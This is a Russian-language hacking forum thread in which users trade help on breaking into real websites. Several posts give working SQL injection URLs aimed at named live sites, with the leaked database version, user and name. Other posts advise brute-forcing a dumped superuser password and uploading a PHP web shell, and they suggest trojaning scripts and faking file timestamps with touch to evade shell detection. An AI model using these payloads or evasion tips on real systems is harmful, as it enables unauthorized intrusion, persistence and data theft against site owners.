Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Если хочешь что бы помог - пиши в асю - 4000840, постараюсь.
     
  2. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    в phpmyadmin если есть доступк обычного юзера, можно как-то смотреть phpinfo или что-то подобное?

    phpmyadmin 3.3.2deb1
     
  3. Lestatkiy

    Lestatkiy Member

    Joined:
    27 Sep 2010
    Messages:
    50
    Likes Received:
    22
    Reputations:
    5
    да, phpinfo.php лежит в корне phpmyadmin`a
     
  4. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    (( белая страница. неважно. нашел уже путь. а теперь проблема. у директрорий стойт 777 права но мускл юзер не может писать/читсть (((( почему? ведь /etc/passwd читает
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    rootmd

    скинь код ошибки
     
    _________________________
  6. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    когда пытаюсь читать файл - ничего. когда писать - Errcode 13
     
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    "chmod 1777" тебе спасет, но кажется у тебя нет прав на выполнение каманд в обалочке.
    попробуй в другие папки...
     
    _________________________
  8. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    в другие папки могу но ведь мне нужно чтоб я смог зайти на нем через веб сервер
     
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    с чего ты взял что там чмод 777 ? 13 ошибка выдает именно то что неты прав на ззапись в данную папку, файл_прив проверял у юзверя? ди унде ешть уэй ?
     
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    я имел ввиду папки, которые видны из веб

    спроведливый вопрос.

    rootmd

    это когда phpmyadmin стал показывать chmod?
     
    _________________________
    1 person likes this.
  11. Bo0oM

    Bo0oM Member

    Joined:
    26 Dec 2009
    Messages:
    2
    Likes Received:
    35
    Reputations:
    21
    Народ, чем брутить SQl inj вида
    1'+and+'1'='1

    Вроде есть тулзы для брута через substring()? кинте в лс плиз
     
  12. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    я знаю что там chmod 777 потому-что юзеры могут залить картинки там.
     
  13. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    не там, а туда..и не факт что если туда юзвери заливают картинки то там права 777...смотря как права выставленны и для какого юзверя...почитай мануал
     
  14. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    хм....ну я 100% уверен что стойт 777, но если нет, что еще можно сделать?

    имеется
    1. sql injection, под суперюзером
    2. phpmyadmin, нормальный юзер
     
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    1.через скуль выведи суперь юзвря пасс, попробуй сбрутить, залей шелл через пыху..

    2. попроси в привате знающих людей что бы помогли, а то вынес моск уже со своим рeсурсом 2 день..
     
  16. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    eclipse
    http://www.stigatabletennis.se/pro_objects_details.php?id=1+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+
    версия как бы намекае
     
    3 people like this.
  17. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,176
    Likes Received:
    617
    Reputations:
    690
    http://www.stigatabletennis.se/pro_objects_details.php?id=-1+union+select+1,2,3,4--
    Version 4.1.22-Max
    Uzver [email protected]
    DB db1081176_stiga_table_tennis
    так что брути таблы...
    upd
    ~d0s~ опередил )
     
    _________________________
    #15757 shell_c0de, 30 Dec 2010
    Last edited: 30 Dec 2010
    4 people like this.
  18. InfectedM

    InfectedM Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    155
    Likes Received:
    12
    Reputations:
    0
    Что за скрипт умет находить шеллы?
    И что можно сделать что бы не детектил..

    Заливаю на сайт шелл , на следующий день его нет.
    В главном каталоге лежит файлик типа "найденные шеллы" и отдельная папка с бекапами шеллов))
     
  19. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,176
    Likes Received:
    617
    Reputations:
    690
    админ дебил попался значить ))
    протроянь скрипты и не забудь про команду touch =)
     
    _________________________
  20. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    очень часто поподаются бд из которых выводится только
    CHARACTER_SETS

    как быть в таком случае?

    http://www.feb.spb.ru/news.php?id=100+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables--
     
Thread Status:
Not open for further replies.